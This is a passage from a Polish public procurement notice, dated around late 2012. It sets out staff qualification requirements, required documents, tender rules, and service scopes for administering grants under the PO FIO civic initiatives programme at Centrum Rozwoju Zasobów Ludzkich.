g)	Przeprowadzenie co najmniej 5 wizyt monitorujących stan realizacji dofinansowanych projektów.


Cz. B- Usługa polegająca na obsłudze konkursu oraz organizacja działań promocyjnych Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.
Spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia t.j.: posiadają co najmniej 1 osobę, która spełnia następujące    warunki :
a)	posiada wykształcenie wyższe, 
b)	posiada co najmniej 3-letnie doświadczenie w pracy zawodowej, której przedmiotem były zagadnienia o charakterze administracyjnym lub związane z funkcjonowaniem organizacji pozarządowych, 
c)	posiada co najmniej dwuletnie doświadczenie w pracy w instytucjach administracji publicznej lub organizacjach pozarządowych, 
d)	co najmniej 3 letnie doświadczenie na stanowisku związanym z realizacją zadań o profilu promocyjnym.
e)	Przeprowadzenie co najmniej 5 wizyt monitorujących stan realizacji dofinansowanych projektów.


Cz. C - Usługa polegająca na przeprowadzeniu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO oraz wsparciu obsługi konkursu..
Spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia t.j.: posiadają co najmniej 1 osobę, która spełnia następujące    warunki :
a)	posiada wykształcenie wyższe,
b)	posiada co najmniej 3-letnie doświadczenie w pracy zawodowej, której przedmiotem są
zagadnienia o charakterze administracyjnym lub społecznym lub związane
z funkcjonowaniem organizacji pozarządowych,
c)	w ciągu ostatnich 2 lat przed upływem terminu składania ofert była zaangażowana
w procedury rozliczania dotacji przyznanych na realizację zadań publicznych. Przy czym przez
zaangażowanie rozumie się złożenie co najmniej 3 wniosków o płatność / rozliczeń dotacji
z realizacji zadań publicznych do instytucji grantodawczych lub uczestniczenie w procedurze
weryfikacji co najmniej 10 dotacji przyznanych na realizację zadań publicznych prowadzonej
przez instytucję administracji publicznej,
d)	posiada co najmniej 2- letnie doświadczenie w pracy w instytucjach administracji publicznej
lub organizacjach pozarządowych.
e)	Przeprowadzenie co najmniej 5 wizyt monitorujących stan realizacji dofinansowanych projektów.

Cz. D - Usługa polegająca na przeprowadzeniu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO oraz wsparciu obsługi konkursu.
Spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia t.j.: posiadają co najmniej 1 osobę, która spełnia następujące    warunki :
a)	posiada wykształcenie wyższe,
b)	posiada co najmniej 2-letnie doświadczenie w pracy zawodowej, której przedmiotem są
zagadnienia o charakterze administracyjnym lub społecznym lub związane
z funkcjonowaniem organizacji pozarządowych,
c)	w ciągu ostatnich 2 lat przed upływem terminu składania ofert była zaangażowana
w procedury rozliczania dotacji przyznanych na realizację zadań publicznych. Przy czym przez
zaangażowanie rozumie się złożenie co najmniej 3 wniosków o płatność / rozliczeń dotacji
z realizacji zadań publicznych do instytucji grantodawczych lub uczestniczenie w procedurze
weryfikacji co najmniej 10 dotacji przyznanych na realizację zadań publicznych prowadzonej
przez instytucję administracji publicznej,
d)	posiada co najmniej 2- letnie doświadczenie w pracy w instytucjach administracji publicznej
lub organizacjach pozarządowych.
e)	Przeprowadzenie co najmniej 5 wizyt monitorujących stan realizacji dofinansowanych projektów.


Cz. E - Usługa polegająca na wsparciu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO - 5 miesięcy 
Spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia t.j.: posiadają co najmniej 1 osobę, która spełnia następujące    warunki :
a)	posiada wykształcenie wyższe,
b)	posiada co najmniej 2-letnie doświadczenie w pracy zawodowej, której przedmiotem są
zagadnienia o charakterze administracyjnym lub społecznym lub związane
z funkcjonowaniem organizacji pozarządowych,
c)	w ciągu ostatnich 2 lat przed upływem terminu składania ofert była zaangażowana
w procedury rozliczania dotacji przyznanych na realizację zadań publicznych. Przy czym przez
zaangażowanie rozumie się złożenie co najmniej 3 wniosków o płatność / rozliczeń dotacji
z realizacji zadań publicznych do instytucji grantodawczych lub uczestniczenie w procedurze
weryfikacji co najmniej 10 dotacji przyznanych na realizację zadań publicznych prowadzonej
przez instytucję administracji publicznej,
d)	posiada co najmniej 2- letnie doświadczenie w pracy w instytucjach administracji publicznej
lub organizacjach pozarządowych.
.

Cz. F - Usługa polegająca na obsłudze administracyjno - logistycznej oraz wsparciu obsługi konkursu i rozliczenia dotacji PO FIO.
Spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia t.j.: posiadają co najmniej 1 osobę, która spełnia następujące    warunki :
a)	posiada wykształcenie wyższe
b)	posiada co najmniej 2-letnie doświadczenie w pracy zawodowej, której przedmiotem są
zagadnienia o charakterze administracyjnym lub związane z funkcjonowaniem organizacji
pozarządowych
c)	posiada co najmniej 2-letnie doświadczenie na stanowisku związanym z wykonywaniem prac
administracyjnych lub logistycznych
d)	Przeprowadzenie co najmniej 5 wizyt monitorujących stan realizacji dofinansowanych projektów.


Cz. G - Obsługa  Usługa polegająca na obsłudze  finansowo - księgowej Programu Operacyjnego Fundusz Inicjatyw Obywatelskich. 
Spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia t.j.: posiadają co najmniej 1 osobę, która spełnia następujące    warunki :
a)	posiada wykształcenie wyższe magisterskie ,
b)	posiada minimum 3 lata doświadczenia zawodowego którego przedmiotem są zagadnienia
związane z obsługa finansowo - księgową,
c)	posiada minimum 2 lata doświadczenia na stanowisku samodzielny-(a) księgowy-(a),

Cz. H - Usługa polegająca na obsłudze prawnej procesu wdrażania Programu Operacyjnego Fundusz Inicjatyw Obywatelskich w Centrum Rozwoju Zasobów Ludzkich. 

Spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia t.j.: posiadają co najmniej 1 osobę, która spełnia następujące    warunki :
1) posiada uprawnienia do wykonywania zawodu radcy prawnego (zgodnie z ustawą z dnia 6 lipca
      1982 r. o radcach prawnych (Dz. U. z 2010 r. Nr 10 poz. 65, z późn. zm.)) lub adwokata (zgodnie
      z ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze (Dz. U. z 2009 r. Nr 146 poz. 1188, z późn.
      zm.)) lub prawnika zagranicznego wykonującego stałą praktykę na podstawie ustawy z dnia
      05.07.2002 roku o świadczeniu pomocy prawnej przez prawników zagranicznych w RP (Dz. U.
      z 2002 r. Nr 126 poz. 1069, z późn. zm.)
2) posiada minimum 5 lat doświadczenia w zakresie wykonywania zawodu radcy prawnego lub
      adwokata lub prawnika zagranicznego wykonującego stałą praktykę na podstawie ustawy z dnia
      05.07.2002 roku o świadczeniu pomocy prawnej przez prawników zagranicznych w RP (Dz. U.
      z 2002 r. Nr 126 poz. 1069, z późn. zm.),w tym:
a) posiada minimum 5-letnie doświadczenie w doradztwie prawnym z zakresu:
- prawa administracyjnego,
- finansów publicznych oraz dyscypliny finansów publicznych,
- problematyki pożytku publicznego i wolontariatu
b) posiada minimum 3- letnie doświadczenie w pracy w administracji publicznej lub wykonywaniu
usług prawnych na rzecz administracji publicznej ,
3) posiada minimum 2 letnie doświadczenie w obsłudze prawnej:
a) dotacji udzielanych ze środków publicznych.
b) środków pochodzących z rezerwy celowej budżetu państwa.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian w umowie. Zmiana umowy może być dokonana w granicach wyznaczonych przepisami ustawy, w tym art. 144 ustawy, wyłącznie za zgodą stron, w formie pisemnej pod rygorem nieważności.
Zmiany umowy mogą nastąpić w następujących przypadkach: 
- zaistnienia omyłki pisarskiej lub rachunkowej. 
- zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. 
- wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, o których Strony nie wiedziały przy zawieraniu umowy , które mają wpływ na terminy realizacji zamówienia. 
-następuje zmiana osób, przy pomocy, których wykonawca realizuje przedmiot umowy, na inne legitymujące się, co najmniej równoważnym doświadczeniem i uprawnieniami, które wymagane były przez Zamawiającego w ogłoszeniu i SIWZ.
Ewentualna zmiana warunków umowy w zakresie określonym wyżej nie może powodować zwiększenia wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.crzl.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.crzl.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.01.2013 godzina 12:00, miejsce: Aleje Jerozolimskie 65/79, 00-697 Warszawa, w sekretariacie Zamawiającego, poziom 0.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach Programu Operacyjnego Fundusz Inicjatyw Obywatelskich , finansowane będzie ze środków rezerwy celowej budżetu państwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa polegająca na koordynacji zadań wynikających z  Porozumienia w sprawie powierzenia obsługi części działań związanych z realizacją Programu Operacyjnego Fundusz Inicjatyw Obywatelskich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koordynacja zadań wynikających z  Porozumienia w sprawie powierzenia obsługi części działań związanych z realizacją Programu Operacyjnego Fundusz Inicjatyw Obywatelskich w latach 2009 - 2013numer BAB/27/03/2009/UCP/DPP z dnia 19 lutego 2009 roku w szczególności: 
1.	Obsługa Programu Operacyjnego Fundusz Inicjatyw Obywatelskich - poprzez koordynację działań związanych z przygotowaniem przez CRZL i zawarciem umów przez CRZL z osobami zajmującymi się obsługą PO FIO (sekcja FIO w Centrum Rozwoju Zasobów Ludzkich) oraz wypłaceniem wynagrodzeń za wykonaną pracę, a także zapewnienie odpowiednich warunków pracy, w tym w szczególności: siedziby, sprzętu, materiałów biurowych oraz dostępu do telefonów i internetu na potrzeby Sekcji FIO.
2.	Modyfikacja generatora
3.	Przydzielenie ekspertom ofert zarejestrowanych w generatorze on-line (1 oferty do 2 ekspertów) zgodnie z metodologią określoną przez DPP oraz poinformowanie ekspertów o przydzielonych ofertach,
4.	Współpraca z wykonawcą generatora sprawozdań w zakresie modyfikacji części sprawozdawczej generatora.
5.	Koordynacja  podejmowanych działań w ramach PO FIO 2012 zgodnie z zawartym Porozumieniem w tym w szczególności:
a)	obsługa infolinii dla oferentów w ogłoszonych konkursach
b)	nadzór nad rejestracją wniosków w generatorze on-line
c)	odbierania wniosków nadesłanych pocztą/kurierem/złożonych bezpośrednio w siedzibie CRZL
d)	rejestracji wniosków w wersji papierowej zgodnie z nadanym automatycznie numerem przez generator wniosków,
e)	przygotowania umów z wyznaczonymi przez DPP MPiPS ekspertami do oceny merytorycznej,
f)	odebrania kart oceny merytorycznej w wersji papierowej i przyporządkowanie ich w segregatorach do poszczególnych ekspertów,
g)	przeprowadzenia weryfikacji formalnej wpływających ofert zgodnie z Zasadami Przyznawania i Rozliczania Dotacji w ramach PO FIO 2013. 
h)	współpracy z  Instytucją Zarządzającą przy rozpatrywaniu odwołań od wyników oceny formalnej w ramach PO FIO 
i)	weryfikacji nadesłanych przez oferentów załączników: kosztorysów i harmonogramów. 
j)	wysyłania drogą elektroniczną informacji dotyczących procedury zawarcia umowy o dofinansowanie w ramach PO FIO 2013.
k)	weryfikacji nadesłanych umów w szczególności pod względem poprawności wypełnienia, dołączenia niezbędnych załączników oraz zgodności podpisów z odpisem z rejestru. 
l)	przekazywania do Departamentu Pożytku Publicznego MPiPS gotowych projektów umów o dofinansowanie w ramach PO FIO 2013.
m)	przekazywania do DPP wygenerowanych z bazy danych wypełnionych wydruków formularzy projektów umów o dofinansowanie projektów po zweryfikowaniu ich prawidłowego wypełnienia
n)	współpracy z DPP przy realizacji procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO,
o)	współpracy przy działaniach promocyjnych PO FIO, zgodnie z Planem Komunikacji na lata 2009-2013 oraz Planem informacji i promocji na 2013 r.,
p)	przekazywania do DPP posiadanych przez CRZL informacji służących  do sporządzenia raportów z realizacji PO FIO dla Ministra, Komitetu Monitorującego, Rady Działalności Pożytku Publicznego i innych podmiotów.
q)	weryfikacji harmonogramu realizacji zadań i terminowości ich wykonywania,
r)	przeprowadzenia wizyt monitorujących stan realizacji projektów dofinansowanych w ramach PO FIO 2012 i PO FIO 2013 na podstawie listy organizacji wytypowanych przez Instytucję Zarządzającą 
s)	przygotowania do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013
6.	Sporządzanie sprawozdań i raportów okresowych do Instytucji Zarządzającej zgodnie z harmonogramem i zakresem Porozumienie nr BAB/27/03/2009/KCP/DPP z dnia 19 lutego 2009 r.
7.	Przygotowywanie zapotrzebowań dotyczących uruchomienia środków finansowych w ramach PO FIO zgodnie z obowiązująca procedurą CRZL..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa polegająca na obsłudze konkursu oraz organizacja działań promocyjnych Programu Operacyjnego Fundusz Inicjatyw Obywatelskich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia: 
Obsługa konkursu (70% czasu wykonywanych zadań zleconych):
1.	Obsługa infolinii dla oferentów w ogłoszonym konkursie 
2.	Rejestracja wniosków w generatorze on-line,
3.	Odbieranie wniosków nadesłanych pocztą/kurierem/złożonych bezpośrednio w siedzibie crzl
4.	Rejestracja wniosków w wersji papierowej zgodnie z nadanym automatycznie numerem przez generator wniosków,
5.	Odebranie kart ocen w wersji elektronicznej w generatorze ofert oraz weryfikacja kart ocen złożonych przez epuap, które zostaną przekazane przez dpp na elektronicznym nośniku danych,
6.	Weryfikacja ocen ekspertów, danych złożonych przez oferentów oraz innych informacji zapisanych generatorze. Weryfikowanie ocen ekspertów w kwestii kryteriów formalnych oraz nanoszenie poprawek na pisemną lub mailową prośbę organizacji
7.	Przeprowadzenie weryfikacji formalnej wpływających ofert zgodnie z zasadami przyznawania i rozliczania dotacji w ramach po fio 2013. 
8.	Współpraca z  instytucją zarządzającą przy rozpatrywaniu odwołań od wyników oceny formalnej w ramach po fio 
9.	Poinformowanie pocztą elektroniczną wnioskodawców, którym minister przyznał dofinansowanie (zgodnie z ogłoszonymi wynikami konkursu), o przyznaniu dotacji i ewentualnej konieczności modyfikacji harmonogramu lub kosztorysu
10.	Weryfikacja nadesłanych przez oferentów załączników: kosztorysów i harmonogramów. 
11.	Wysyłanie drogą elektroniczną informacji dotyczących procedury zawarcia umowy o dofinansowanie w ramach po fio 2013.
12.	Weryfikacja nadesłanych umów w szczególności pod względem poprawności wypełnienia, dołączenia niezbędnych załączników oraz zgodności podpisów z odpisem z rejestru. 
13.	Przekazywanie do departamentu pożytku publicznego mpips gotowych projektów umów o dofinansowanie w ramach po fio 2013.
14.	Wprowadzanie niezbędnych danych do generatora ofert.
15.	Przeprowadzenie wizyt monitorujących stan realizacji projektów dofinansowanych w ramach po fio 2012 i po fio 2013 na podstawie listy organizacji wytypowanych przez instytucję zarządzającą .
Organizacja działań promocyjnych Programu Operacyjnego Fundusz Inicjatyw Obywatelskich (25% czasu wykonywanych zadań zleconych):
1.	Realizację działań promocyjnych PO FIO, zgodnie z Planem Komunikacji oraz Planem informacji i promocji na rok 2013,
a.	Przekazywanie do konsultacji i akceptacji DPP projektów / koncepcji materiałów informacyjnych i promocyjnych, 
b.	Realizacja uzgodnionych działań promocyjnych.
2.	Realizację działań promocyjnych zgodnie z harmonogramem Planu Informacji i Promocji na rok 2013, w tym udział w konferencjach - spotkaniach informacyjnych organizowanych w ramach PO FIO.
3.	Przygotowanie raportów częściowych oraz raportu końcowego z realizacji działań promocyjnych przez CRZL dla Ministerstwa Pracy i Polityki Społecznej.

Ewidencja i archiwizacja  dokumentów będących w posiadaniu Sekcji FIO( 5 % czasu wykonywanych zadań zleconych ),w tym:
przygotowanie do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa polegająca na przeprowadzeniu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO oraz wsparciu obsługi konkursu.

Zakres zamówienia: 
Przeprowadzenia procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO (70% czasu wykonywanych zadań zleconych):.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia: 
Przeprowadzenia procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO (70% czasu wykonywanych zadań zleconych):
1.	Obsługa infolinii dla Zleceniobiorców  rozliczających dotację. 
2.	Przygotowanie umów dla ekspertów analizujących  sprawozdania z realizacji zadań dofinansowanych w ramach PO FIO 2012-2013.
3.	Przekazanie ekspertom dokumentacji sprawozdawczej zgodnie z metodologią rozliczania dotacji w ramach PO FIO.
4.	Odebranie od ekspertów - kart ocen w wersji elektronicznej w generatorze sprawozdań on-line oraz w wersji papierowej.
5.	Sprawdzenie i akceptacja ocenionych sprawozdań z wykorzystaniem środków udzielonych w ramach PO FIO, zgodnie z metodologią rozliczania dotacji w ramach PO FIO oraz  zgodnie z przepisami prawa, w szczególności z ustawą o finansach publicznych, ustawą o działalności pożytku publicznego i o wolontariacie, Programem Operacyjnym FIO 2009-2013, Zasadami przyznawania i rozliczania dotacji w ramach PO FIO w roku 2011-2013 oraz w oparciu o analizy sprawozdań sporządzone przez ekspertów.
6.	Przygotowanie analizy sprawozdania  dla beneficjentów zgodnie z metodologią rozliczania dotacji w ramach PO FIO. 
7.	Weryfikację przesłanej dokumentacji przez beneficjentów rozliczających dotację w ramach PO FIO.
8.	Monitorowanie terminowości odpowiedzi na przesłane do beneficjentów analizy sprawozdań zawierające konieczność przesłania dodatkowych wyjaśnień/uzupełnień. 
9.	Opracowywanie odwołań wraz z rekomendacją CRZL-u w przypadkach rozliczania dotacji wymagających stanowiska Instytucji Zarządzającej.
10.	Sporządzenie informacji o organizacjach, które nie złożyły sprawozdań w wersji elektronicznej w Generatorze w  ramach Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.
11.	Podejmowanie próby kontaktu telefonicznego i e-mailowego z beneficjentami  w celu przesłania brakującego sprawozdania.
12.	Sporządzanie dla Instytucji Zarządzającej listy organizacji, które nie rozliczyły dotacji wraz z opisem stanu sprawy w celu przeprowadzenia postępowania administracyjnego.
13.	Obsługa organizacyjna i udział Wykonawcy w konferencjach - spotkaniach informacyjnych organizowanych w ramach PO FIO, zgodnie z Planem Informacji i Promocji na rok 2013.

Obsługa konkursu (25 % czasu wykonywanych zadań zleconych):
1.	Weryfikację nadesłanych przez oferentów załączników: kosztorysów i harmonogramów. 
2.	Weryfikację nadesłanych umów w szczególności pod względem poprawności wypełnienia, dołączenia niezbędnych załączników oraz zgodności podpisów z odpisem z rejestru. 
3.	Przekazywanie do departamentu pożytku publicznego mpips gotowych projektów umów o dofinansowanie w ramach po fio 2013.
4.	Przeprowadzenia wizyt monitorujących stan realizacji projektów dofinansowanych w ramach po fio 2012 i po fio 2013 na podstawie listy organizacji wytypowanych przez instytucję zarządzającą .

Ewidencja i archiwizacja  dokumentów będących w posiadaniu Sekcji FIO( 5 % czasu wykonywanych zadań zleconych ),w tym:
przygotowanie do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługa polegająca na przeprowadzeniu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO oraz wsparciu obsługi konkursu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenia procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO poprzez (70% czasu wykonywanych zadań zleconych):
1.	Przekazanie ekspertom dokumentacji sprawozdawczej zgodnie z metodologią rozliczania dotacji w ramach PO FIO.
2.	Odebranie od ekspertów - kart ocen w wersji elektronicznej w generatorze sprawozdań on-line oraz w wersji papierowej. 
3.	Sprawdzenie i akceptacja ocenionych sprawozdań z wykorzystaniem środków udzielonych w ramach PO FIO, zgodnie z metodologią rozliczania dotacji w ramach PO FIO oraz  zgodnie z przepisami prawa, w szczególności z ustawą o finansach publicznych, ustawą o działalności pożytku publicznego i o wolontariacie, Programem Operacyjnym FIO 2009-2013, Zasadami przyznawania i rozliczania dotacji w ramach PO FIO w roku 2011-2013 oraz w oparciu o analizy sprawozdań sporządzone przez ekspertów.
4.	Przygotowanie analizy sprawozdania  dla beneficjentów zgodnie z metodologią rozliczania dotacji w ramach PO FIO.
5.	Weryfikację przesłanej dokumentacji przez beneficjentów rozliczających dotację w ramach PO FIO.
6.	Monitorowanie terminowości odpowiedzi na przesłane do beneficjentów analizy sprawozdań zawierające konieczność przesłania dodatkowych wyjaśnień/uzupełnień. 
7.	Opracowywanie odwołań wraz z rekomendacją CRZL-u w przypadkach rozliczania dotacji wymagających stanowiska Instytucji Zarządzającej.
8.	Sporządzenie informacji o organizacjach, które nie złożyły sprawozdań w wersji elektronicznej w Generatorze w  ramach Programu Operacyjnego Fundusz Inicjatyw Obywatelskich.
9.	Podejmowanie próby kontaktu telefonicznego i e-mailowego z beneficjentami  w celu przesłania brakującego sprawozdania.
10.	Sporządzanie dla Instytucji Zarządzającej listy organizacji, które nie rozliczyły dotacji wraz z opisem stanu sprawy w celu przeprowadzenia postępowania administracyjnego.
11.	Prowadzenie rejestrów rozliczonych umów.
12.	Obsługa infolinii dla Zleceniobiorców  rozliczających dotację. 
13.	Obsługa organizacyjna i udział Wykonawcy w konferencjach - spotkaniach informacyjnych organizowanych w ramach PO FIO, zgodnie z Planem Informacji i Promocji na rok 2013.

Obsługa konkursu (25 % czasu wykonywanych zadań zleconych):
1.	Weryfikację nadesłanych przez oferentów załączników: kosztorysów i harmonogramów. 
2.	Weryfikację nadesłanych umów w szczególności pod względem poprawności wypełnienia, dołączenia niezbędnych załączników oraz zgodności podpisów z odpisem z rejestru. 
3.	Przekazywanie do Departamentu Pożytku Publicznego mpips gotowych projektów umów o dofinansowanie w ramach PO FIO 2013.
4.	Przeprowadzenia wizyt monitorujących stan realizacji projektów dofinansowanych w ramach PO FIO 2012 i PO FIO 2013 na podstawie listy organizacji wytypowanych przez Instytucję Zarządzającą .

Ewidencja i archiwizacja  dokumentów będących w posiadaniu Sekcji FIO( 5 % czasu wykonywanych zadań zleconych ),w tym:
przygotowanie do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługa polegająca na wsparciu procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO - 5 miesięcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia: 
